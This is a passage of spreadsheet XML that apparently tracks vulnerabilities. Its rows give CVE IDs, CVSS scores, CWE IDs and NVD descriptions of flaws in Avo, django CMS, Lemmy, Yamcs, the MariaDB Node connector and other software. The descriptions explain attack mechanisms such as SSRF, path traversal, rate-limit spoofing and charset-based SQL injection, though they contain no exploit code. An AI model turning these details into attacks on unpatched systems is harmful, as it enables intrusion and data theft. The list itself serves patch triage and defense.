        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3882" s="5" t="inlineStr"/>
      <c r="K3882" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L3882" s="5" t="inlineStr">
        <is>
          <t>Avo is a framework to create admin panels for Ruby on Rails apps. From version 2.28.0 to before version 3.32.0, Avo's direct attachment upload endpoint lacks server-side upload authorization and bypasses the documented field-level upload policy methods such as upload_{FIELD_ID}?. An authenticated Avo user who can reach the Avo attachment upload endpoint can replace or add attachment content, including binary content, filename, and content-type metadata, on a resolved record even when both update? and upload_&lt;field&gt;? policies deny the operation. This primarily affects multi-role Avo Pro/Advanced-style deployments where non-administrator or restricted operator users can reach Avo and per-record or per-field operations are expected to be enforced by policies. This issue has been patched in version 3.32.0.</t>
        </is>
      </c>
      <c r="M3882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53769</t>
        </is>
      </c>
    </row>
    <row r="3883">
      <c r="A3883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53959</t>
        </is>
      </c>
      <c r="C3883" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3883" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3883" s="5" t="inlineStr"/>
      <c r="F3883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3883" s="5" t="inlineStr"/>
      <c r="H3883" s="5" t="inlineStr"/>
      <c r="I3883" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3883" s="5" t="inlineStr"/>
      <c r="K3883" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3883" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.9, 4gaBoards allows any authenticated user to enumerate account information for every user through GET /api/users and retrieve arbitrary accounts through GET /api/users/:id. The users/index and users/show actions rely only on the default is-authenticated policy in server/config/policies.js, and server/api/controllers/users/index.js returns the result of sails.helpers.users.getMany() without requester-specific authorization or response sanitization. Responses expose email, phone, organization, name, isAdmin, ssoGoogleEmail, ssoGithubEmail, and other SSO-linked email fields, including data for administrators. This enables instance-wide user enumeration, privacy loss, and targeted phishing reconnaissance. This issue is fixed in version 3.3.9.</t>
        </is>
      </c>
      <c r="M3883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53959</t>
        </is>
      </c>
    </row>
    <row r="3884">
      <c r="A3884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54054</t>
        </is>
      </c>
      <c r="C3884" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3884" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3884" s="5" t="inlineStr"/>
      <c r="F3884" s="5" t="inlineStr"/>
      <c r="G3884" s="5" t="inlineStr"/>
      <c r="H3884" s="5" t="inlineStr"/>
      <c r="I3884" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3884" s="5" t="inlineStr"/>
      <c r="K3884" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3884" s="5" t="inlineStr">
        <is>
          <t>Transmute is a free, open-source, self-hosted file conversion and compression tool. Prior to version 1.3.0, Transmute's URL import endpoint, `POST /api/files/url`, is vulnerable to Server-Side Request Forgery (SSRF). The HTTP downloader used by this endpoint fetches user-supplied URLs with redirects enabled and does not validate whether the target resolves to a public, external address. As a result, an authenticated user (or guest user if they are enabled) may be able to cause the Transmute server to make HTTP requests to internal or cloud-local resources from the server's network position. Because downloaded content is stored and can later be retrieved through `GET /api/files/{id}`, this issue can result in full-read SSRF rather than blind SSRF. This is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M3884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54054</t>
        </is>
      </c>
    </row>
    <row r="3885">
      <c r="A3885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54622</t>
        </is>
      </c>
      <c r="C3885" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3885" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3885" s="5" t="inlineStr"/>
      <c r="F3885" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3885" s="5" t="inlineStr"/>
      <c r="H3885" s="5" t="inlineStr"/>
      <c r="I3885" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3885" s="5" t="inlineStr"/>
      <c r="K3885" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3885" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. Prior to 5.0.8, the copy_plugins endpoint in cms/admin/placeholderadmin.py authorizes only the destination clipboard. The _copy_plugin_to_clipboard and _copy_placeholder_to_clipboard paths accept source_placeholder_id and source_plugin_id values but use has_copy_plugins_permission and check_source only for the requesting user’s clipboard, without validating the source placeholder. Under CMS_PERMISSION, a staff user with the global add permission for a plugin type can copy plugins from an unauthorized page or placeholder into the user’s clipboard and read secret text, link names, and URLs. This issue is fixed in versions 5.0.8.</t>
        </is>
      </c>
      <c r="M3885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54622</t>
        </is>
      </c>
    </row>
    <row r="3886">
      <c r="A3886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54624</t>
        </is>
      </c>
      <c r="C3886" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3886" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3886" s="5" t="inlineStr"/>
      <c r="F3886" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3886" s="5" t="inlineStr"/>
      <c r="H3886" s="5" t="inlineStr"/>
      <c r="I3886" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3886" s="5" t="inlineStr"/>
      <c r="K3886" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="L3886" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. Prior to 5.0.8, render_object_structure in cms/views.py renders cms/toolbar/structure.html for a PageContent object without calling user_can_view_page(). Any staff account can request a restricted page’s structure when CMS_PERMISSION is enabled and the page has view restrictions or CMS_PUBLIC_FOR is set to staff. The response exposes plugin get_short_description() values, including link names, URLs, and text snippets, rather than only the page shape. This issue is fixed in versions 5.0.8.</t>
        </is>
      </c>
      <c r="M3886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54624</t>
        </is>
      </c>
    </row>
    <row r="3887">
      <c r="A3887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54732</t>
        </is>
      </c>
      <c r="C3887" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3887" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3887" s="5" t="inlineStr"/>
      <c r="F3887" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3887" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3887" s="5" t="inlineStr"/>
      <c r="I3887" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3887" s="5" t="inlineStr"/>
      <c r="K3887" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3887" s="5" t="inlineStr">
        <is>
          <t>libreoffice-convert is a Node.js module for converting office documents to different formats. Prior to 1.8.2, index.js uses the caller-controlled options.fileName value in path.join(tempDir.name, fileName) without reducing it to a base name. A filename containing ../ can escape the temporary directory because path.basename() normalization is missing and write the supplied document buffer to an arbitrary path writable by the process, including an SSH authorized_keys file, a cron configuration, or a web root. This issue is fixed in version 1.8.2.</t>
        </is>
      </c>
      <c r="M3887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54732</t>
        </is>
      </c>
    </row>
    <row r="3888">
      <c r="A3888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54738</t>
        </is>
      </c>
      <c r="C3888" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3888" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3888" s="5" t="inlineStr"/>
      <c r="F3888" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3888" s="5" t="inlineStr">
        <is>
          <t>nginx, docker</t>
        </is>
      </c>
      <c r="H3888" s="5" t="inlineStr"/>
      <c r="I3888" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3888" s="5" t="inlineStr"/>
      <c r="K3888" s="5" t="inlineStr">
        <is>
          <t>CWE-799</t>
        </is>
      </c>
      <c r="L3888" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to 0.19.19 and 1.0.0-beta.1, actix-web ConnectionInfo::realip_remote_addr reads the first value of X-Forwarded-For as the client address used by raw_ip_key in crates/utils/src/rate_limit/mod.rs. Lemmy's bundled docker/nginx.conf uses $proxy_add_x_forwarded_for instead of $remote_addr, which appends the real client address to an X-Forwarded-For value supplied by the client. An unauthenticated attacker can therefore place a different spoofed address first on each request and receive a new rate-limit bucket, bypassing limits on POST /api/v4/account/auth/register, POST /api/v4/account/auth/login, POST /api/v4/post, POST /api/v4/comment, GET /api/v4/search, POST /api/v4/image, and POST /api/v4/account/import_settings. This permits excessive account creation, brute-force attempts, spam, scraping, uploads, and repeated imports. This issue is fixed in versions 0.19.19 and 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M3888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54738</t>
        </is>
      </c>
    </row>
    <row r="3889">
      <c r="A3889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54740</t>
        </is>
      </c>
      <c r="C3889" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3889" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3889" s="5" t="inlineStr"/>
      <c r="F3889" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3889" s="5" t="inlineStr"/>
      <c r="H3889" s="5" t="inlineStr"/>
      <c r="I3889" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3889" s="5" t="inlineStr"/>
      <c r="K3889" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3889" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to 0.19.19 and 1.0.0-alpha.18, a lower-ranked remote moderator can remove a higher-ranked moderator by sending a signed ActivityPub Remove activity to the target instance. The local API uses LocalUser::is_higher_mod_or_admin_check to enforce moderator rank, but CollectionRemove::verify in crates/apub/activities/src/community/collection_remove.rs only calls verify_mod_action. CollectionRemove::receive dereferences self.object as an ApubPerson, creates a CommunityModeratorForm, and calls CommunityActions::leave without checking that the actor outranks the moderator identified by the object field. In communities with federated moderators, a junior moderator can therefore strip senior moderators from the community moderator list even though the local API rejects the same action. This issue is fixed in versions 0.19.19 and 1.0.0-alpha.18.</t>
        </is>
      </c>
      <c r="M3889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54740</t>
        </is>
      </c>
    </row>
    <row r="3890">
      <c r="A3890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55221</t>
        </is>
      </c>
      <c r="C3890" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3890" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3890" s="5" t="inlineStr"/>
      <c r="F3890" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3890" s="5" t="inlineStr"/>
      <c r="H3890" s="5" t="inlineStr"/>
      <c r="I3890" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3890" s="5" t="inlineStr"/>
      <c r="K3890" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L3890" s="5" t="inlineStr">
        <is>
          <t>Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.10.0, Boruta logged sensitive OAuth and OpenID Connect values in business event logs. Logged values could include access tokens, refresh tokens, authorization codes, agent tokens, direct-post codes, ID tokens, VP tokens, and tokens submitted to introspection or revocation endpoints. An attacker with access to Boruta logs, log aggregation systems, or the administration log viewer could recover these credentials and use them until expiration or revocation. This issue has been patched in version 0.10.0.</t>
        </is>
      </c>
      <c r="M3890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55221</t>
        </is>
      </c>
    </row>
    <row r="3891">
      <c r="A3891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55256</t>
        </is>
      </c>
      <c r="C3891" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3891" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3891" s="5" t="inlineStr"/>
      <c r="F3891" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3891" s="5" t="inlineStr"/>
      <c r="H3891" s="5" t="inlineStr"/>
      <c r="I3891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3891" s="5" t="inlineStr"/>
      <c r="K3891" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3891" s="5" t="inlineStr">
        <is>
          <t>In parsePartHeaders of multiple files, there is a possible persistent denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M3891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55256</t>
        </is>
      </c>
    </row>
    <row r="3892">
      <c r="A3892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55497</t>
        </is>
      </c>
      <c r="C3892" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3892" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3892" s="5" t="inlineStr"/>
      <c r="F3892" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3892" s="5" t="inlineStr"/>
      <c r="H3892" s="5" t="inlineStr"/>
      <c r="I3892" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3892" s="5" t="inlineStr"/>
      <c r="K3892" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L3892" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, the built-in thumbnail and avatar image decoders limit compressed file size but do not limit decoded pixel dimensions, allowing an authenticated user to submit a small PNG, JPEG, or GIF that triggers an unbounded allocation and terminates the Cloudreve process through fatal out-of-memory behavior. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M3892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55497</t>
        </is>
      </c>
    </row>
    <row r="3893">
      <c r="A3893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55531</t>
        </is>
      </c>
      <c r="C3893" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3893" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3893" s="5" t="inlineStr"/>
      <c r="F3893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3893" s="5" t="inlineStr"/>
      <c r="H3893" s="5" t="inlineStr"/>
      <c r="I3893" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3893" s="5" t="inlineStr"/>
      <c r="K3893" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L3893" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, the MCP HTTP Stream mcp_post handler creates a new _sessions entry for every initialize request but does not call _cleanup_sessions or enforce a maximum. An unauthenticated caller can exhaust memory. The fix invokes cleanup and limits sessions through PRAISONAI_MCP_MAX_SESSIONS. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55531</t>
        </is>
      </c>
    </row>
    <row r="3894">
      <c r="A3894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55545</t>
        </is>
      </c>
      <c r="C3894" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3894" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3894" s="5" t="inlineStr"/>
      <c r="F3894" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3894" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3894" s="5" t="inlineStr"/>
      <c r="I3894" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3894" s="5" t="inlineStr"/>
      <c r="K3894" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3894" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs WebSocket subscription handlers fail to enforce the privileges required by equivalent REST endpoints. PacketsApi.subscribePackets exposes the packets WebSocket topic without ObjectPrivilegeType.ReadPacket, ProcessingApi.subscribeAlgorithmStatus exposes the algorithm-status WebSocket topic without ObjectPrivilegeType.ReadAlgorithm, and MdbOverrideApi.subscribeMdbChanges exposes the mdb-changes WebSocket topic without SystemPrivilege.GetMissionDatabase. A low-privilege authenticated user can receive telemetry packets, algorithm status, and mission database change information outside the assigned authorization scope. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M3894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55545</t>
        </is>
      </c>
    </row>
    <row r="3895">
      <c r="A3895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55549</t>
        </is>
      </c>
      <c r="C3895" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3895" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3895" s="5" t="inlineStr"/>
      <c r="F3895" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3895" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3895" s="5" t="inlineStr"/>
      <c r="I3895" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3895" s="5" t="inlineStr"/>
      <c r="K3895" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3895" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.9.4, Yamcs reflects an attacker-controlled redirect_uri parameter from GET /auth/authorize into yamcs-core/src/main/resources/auth/templates/authorize.html without adequate HTML escaping by yamcs-core/src/main/java/org/yamcs/http/auth/AuthHandler.java and yamcs-core/src/main/java/org/yamcs/http/HandlerContext.java. A crafted authorization URL can execute JavaScript when opened by a Yamcs user. The script can access browser-held authentication material and transmit it to an attacker, enabling account compromise. This issue is fixed in version 5.9.4.</t>
        </is>
      </c>
      <c r="M3895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55549</t>
        </is>
      </c>
    </row>
    <row r="3896">
      <c r="A3896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55588</t>
        </is>
      </c>
      <c r="C3896" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3896" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3896" s="5" t="inlineStr"/>
      <c r="F3896" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3896" s="5" t="inlineStr"/>
      <c r="H3896" s="5" t="inlineStr"/>
      <c r="I3896" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3896" s="5" t="inlineStr"/>
      <c r="K3896" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="L3896" s="5" t="inlineStr">
        <is>
          <t>ORAS (OCI Registry As Storage) is a CLI and library for managing artifacts in OCI registries. In ORAS CLI versions up to and including 1.3.2, the recursive referrer traversal does not track visited descriptors, so a malicious OCI registry that returns a cyclic referrer graph causes unbounded recursion and memory growth. This affects oras discover, whose recursive traversal is enabled by default because the --depth option defaults to 0 (unlimited), as well as the recursive referrer counting used by the oras backup and oras restore workflows. A cyclic graph can be as simple as A referring to B and B referring back to A. A malicious registry can use this to cause a client-side denial of service, exhausting CPU and memory and hanging automation or CI/CD pipelines that run ORAS against untrusted registry metadata. The vulnerability does not extend to code execution, artifact substitution, or integrity bypass. This issue has been fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M3896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55588</t>
        </is>
      </c>
    </row>
    <row r="3897">
      <c r="A3897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55593</t>
        </is>
      </c>
      <c r="C3897" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3897" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3897" s="5" t="inlineStr"/>
      <c r="F3897" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3897" s="5" t="inlineStr"/>
      <c r="H3897" s="5" t="inlineStr"/>
      <c r="I3897" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3897" s="5" t="inlineStr"/>
      <c r="K3897" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3897" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, the standalone lib/ajax.php entry point bypasses the centralized request validation in lib/init.php, and Ajax::handle in lib/Froxlor/Ajax/Ajax.php checks only for a valid session before routing state-changing requests. The editapikey action in Ajax::editApiKey updates allowed_from and valid_until without validating a CSRF token, while templates/Froxlor/assets/js/jquery/apikeys.js sends no token because the endpoint does not require one. An unauthenticated attacker can induce an authenticated administrator's browser to submit a forged request that adds an attacker-controlled address to an API key's allowed_from list or removes its expiration, weakening the key's security restrictions. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M3897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55593</t>
        </is>
      </c>
    </row>
    <row r="3898">
      <c r="A3898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55618</t>
        </is>
      </c>
      <c r="C3898" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3898" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3898" s="5" t="inlineStr"/>
      <c r="F3898" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3898" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3898" s="5" t="inlineStr"/>
      <c r="I3898" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3898" s="5" t="inlineStr"/>
      <c r="K3898" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L3898" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, the clean_found_uri function in eml_parser/parser.py validates potential URL strings before unescaping HTML entities used for colon, slash, or period characters. Valid encoded URLs and their host names are therefore rejected and omitted from the extracted URL and domain lists. Email security gateways and SOC pipelines that use those lists as indicators of compromise may fail to submit the hidden URLs to threat intelligence feeds, reputation services, or sandboxes, allowing malicious links to bypass inspection. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M3898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55618</t>
        </is>
      </c>
    </row>
    <row r="3899">
      <c r="A3899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55855</t>
        </is>
      </c>
      <c r="C3899" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3899" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3899" s="5" t="inlineStr"/>
      <c r="F3899" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3899" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H3899" s="5" t="inlineStr"/>
      <c r="I3899" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3899" s="5" t="inlineStr"/>
      <c r="K3899" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-89</t>
        </is>
      </c>
      <c r="L3899" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js permits SQL injection when attacker-controlled Buffer parameters are escaped client-side under the big5, gbk, sjis, cp932, or gb18030 client character sets. PacketOutputStream.writeBufferEscape in lib/io/packet-output-stream.js escaped bytes without the charset-aware getMbRecognizer logic in lib/misc/charset-mb.js. The server SQL lexer runs my_ismbchar before escape processing, so an attacker-controlled lead byte can consume the inserted 0x5C backslash as a multibyte trail byte and leave the following 0x27 quote unescaped, terminating the string literal and allowing arbitrary SQL. The default utf8mb4 character set and parameters sent through the execute binary prepared-statement path are not affected. Successful exploitation can expose or modify data available to the database account. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M3899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55855</t>
        </is>
      </c>
    </row>
    <row r="3900">
      <c r="A3900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56818</t>
        </is>
      </c>
      <c r="C3900" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3900" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3900" s="5" t="inlineStr"/>
      <c r="F3900" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3900" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H3900" s="5" t="inlineStr"/>
      <c r="I3900" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3900" s="5" t="inlineStr"/>
      <c r="K3900" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-703</t>
        </is>
      </c>
      <c r="L3900" s="5" t="inlineStr">
        <is>
